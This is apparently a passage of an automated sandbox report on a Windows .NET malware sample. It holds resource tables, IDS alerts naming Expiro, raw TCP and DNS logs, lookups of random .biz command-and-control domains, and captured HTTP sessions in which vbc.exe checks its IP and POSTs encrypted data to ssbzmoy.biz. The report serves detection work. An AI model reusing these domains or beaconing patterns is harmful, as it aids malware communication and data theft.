| RT_ICON | 0x15e130 | 0x244f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9797740720817644 |
| RT_GROUP_ICON | 0x160580 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0x160594 | 0x288 | data | | | 0.46141975308641975 |
| RT_MANIFEST | 0x16081c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-28T22:44:28.600332+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49718 | 132.226.247.73 | 80 | TCP |
| 2024-11-28T22:44:37.090921+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49740 | TCP |
| 2024-11-28T22:44:37.090921+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49740 | TCP |
| 2024-11-28T22:44:41.628617+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49754 | 132.226.247.73 | 80 | TCP |
| 2024-11-28T22:44:49.363972+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.7 | 53251 | 1.1.1.1 | 53 | UDP |
| 2024-11-28T22:44:51.227117+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49780 | 172.234.222.138 | 80 | TCP |
| 2024-11-28T22:44:52.841706+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP |
| 2024-11-28T22:44:53.832881+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP |
| 2024-11-28T22:44:54.848703+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP |
| 2024-11-28T22:44:56.874648+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP |
| 2024-11-28T22:46:06.959081+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49903 | 82.112.184.197 | 80 | TCP |
| 2024-11-28T22:46:17.023299+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 49922 | TCP |
| 2024-11-28T22:46:17.023299+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 49922 | TCP |
                                                                                                                                                                    Nov 28, 2024 22:44:52.800791025 CET8049787172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.517801046 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.557226896 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.637973070 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.638052940 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.638345003 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.638411999 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.677265882 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.677349091 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.677488089 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.677501917 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.758388042 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.758402109 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.797620058 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.797631025 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.567760944 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.567872047 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.567949057 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.583169937 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.583508968 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.583698988 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.585833073 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.596152067 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.687891006 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.703558922 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.705718040 CET804985282.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.705800056 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.706005096 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.706033945 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.716325998 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.716401100 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.716563940 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.716583014 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.825997114 CET804985282.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.826011896 CET804985282.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.836508989 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.836519957 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:26.678930044 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.588466883 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.708458900 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:27.708549976 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.728472948 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.728472948 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.848455906 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:27.848474979 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:33.461400032 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:33.461467981 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:45:44.749185085 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:44.749383926 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:44.749478102 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:44.869487047 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:44.895390034 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.015783072 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:45.015876055 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.016161919 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.016175985 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.136301994 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:45.136317015 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:46.524276972 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:46.525032043 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:45:49.646241903 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.646334887 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.646385908 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.648278952 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.768748999 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.770647049 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.770714998 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.770873070 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.770898104 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.890791893 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.890805006 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:06.959023952 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:06.959080935 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:06.960428953 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:06.962188005 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.080486059 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:07.082166910 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:07.082323074 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.082426071 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.082452059 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.202343941 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:07.202373028 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:08.473320007 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:46:08.593493938 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:11.740159035 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:11.740219116 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:11.740278006 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:11.860217094 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.653141975 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.773236990 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.773907900 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.774070978 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.774086952 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.894012928 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.894037962 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.902856112 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.902930021 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.902975082 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:16.903345108 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:17.023298979 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:21.536088943 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:46:21.656418085 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:29.037707090 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:29.037792921 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:29.037834883 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:29.158154964 CET804992182.112.184.197192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                    Nov 28, 2024 22:44:49.362843037 CET53567961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:49.362859964 CET53567961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:49.363116980 CET53567961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:49.363971949 CET5325153192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:49.863692999 CET53532511.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.608321905 CET6207353192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:52.840854883 CET53620731.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.841706038 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:53.832880974 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:54.848702908 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:56.874648094 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:59.083451986 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.083472967 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.083482981 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.083524942 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.084439039 CET5365453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:59.314755917 CET53536541.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.315699100 CET6202053192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:59.540350914 CET53620201.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.542212963 CET4924553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:45:00.506107092 CET53492451.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:26.679733992 CET6349953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:45:27.583204985 CET53634991.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:44.750461102 CET5463353192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:45:44.888593912 CET53546331.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:11.740989923 CET5224953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:12.738260031 CET5224953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:13.754035950 CET5224953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:14.648359060 CET53522491.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.648423910 CET53522491.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.648435116 CET53522491.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.907283068 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:17.910101891 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:18.925837040 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:20.925868034 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:23.140171051 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140188932 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140202045 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140209913 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140904903 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:24.145323992 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:25.162677050 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:27.160124063 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:28.047879934 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:28.047894955 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:28.047904015 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:28.047982931 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:29.038467884 CET5544453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:29.175770044 CET53554441.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:42.662859917 CET5994553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:43.676070929 CET5994553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:44.691634893 CET5994553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:45.939476013 CET53599451.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:45.939491034 CET53599451.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:45.939502001 CET53599451.1.1.1192.168.2.7
DNS Queries: Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
DNS Answers: Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                    Nov 28, 2024 22:44:49.362843037 CET1.1.1.1192.168.2.70x9c1eServer failure (2)npukfztj.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.362859964 CET1.1.1.1192.168.2.70x9c1eServer failure (2)npukfztj.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.363116980 CET1.1.1.1192.168.2.70x9c1eServer failure (2)npukfztj.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.863692999 CET1.1.1.1192.168.2.70xf9daNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.863692999 CET1.1.1.1192.168.2.70xf9daNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:52.840854883 CET1.1.1.1192.168.2.70xa3f8Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083451986 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083472967 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083482981 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083524942 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.314755917 CET1.1.1.1192.168.2.70x52adName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.540350914 CET1.1.1.1192.168.2.70x5306Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:00.506107092 CET1.1.1.1192.168.2.70xe90eNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:27.583204985 CET1.1.1.1192.168.2.70x9acaNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:44.888593912 CET1.1.1.1192.168.2.70x7f52No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:14.648359060 CET1.1.1.1192.168.2.70x89d0No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:14.648423910 CET1.1.1.1192.168.2.70x89d0No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:14.648435116 CET1.1.1.1192.168.2.70x89d0No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140171051 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140188932 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140202045 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140209913 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047879934 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047894955 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047904015 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047982931 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:29.175770044 CET1.1.1.1192.168.2.70xeb08No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:45.939476013 CET1.1.1.1192.168.2.70xe057No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:45.939491034 CET1.1.1.1192.168.2.70xe057No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:45.939502001 CET1.1.1.1192.168.2.70xe057No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
• reallyfreegeoip.org
• checkip.dyndns.org
• ssbzmoy.biz
• przvgke.biz
• lpuegx.biz
• vjaxhpbji.biz
• xlfhhhm.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49718 | 132.226.247.73 | 80 | 7796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:26.660605907 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 28, 2024 22:44:27.994559050 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 28 Nov 2024 21:44:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f22ba38775d019294b100fe78ff83aaa
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Nov 28, 2024 22:44:28.036232948 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 28, 2024 22:44:28.461354971 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 28 Nov 2024 21:44:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c7d2cfcb60918463fc9e299f8d935cc4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49740 | 18.141.10.107 | 80 | 7796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:34.926409960 CET | 344 | OUT | POST /j HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:44:34.926440954 CET | 834 | OUT | Data Raw: bb 51 5c c3 2c 86 67 ed 36 03 00 00 2a 05 e2 93 84 df 63 8b 47 8f 51 9d 77 e9 a2 2f 73 99 db 64 c8 20 17 7a d6 f2 f4 9e c1 ea 36 c2 8f 87 4f 3f e9 12 b7 5d db 28 87 4d 18 ba ff 52 6d 0c 21 47 39 40 ea 09 d0 86 76 7f 03 a3 cf a3 a5 f3 63 3c de ac
Data Ascii: Q\,g6*cGQw/sd z6O?](MRm!G9@vc<AlITCQYSXKz\1a_Kr2zr1BaTmeK8{I}d_dO8.ZZ~DV%L%Fp91w;5CTEIS6A@j
Nov 28, 2024 22:44:36.970561028 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 21:44:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9304305ae0ce9b2e67a6c7add67f1096|8.46.123.228|1732830276|1732830276|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49743 | 18.141.10.107 | 80 | 7880 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:35.051719904 CET | 344 | OUT | POST /j HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
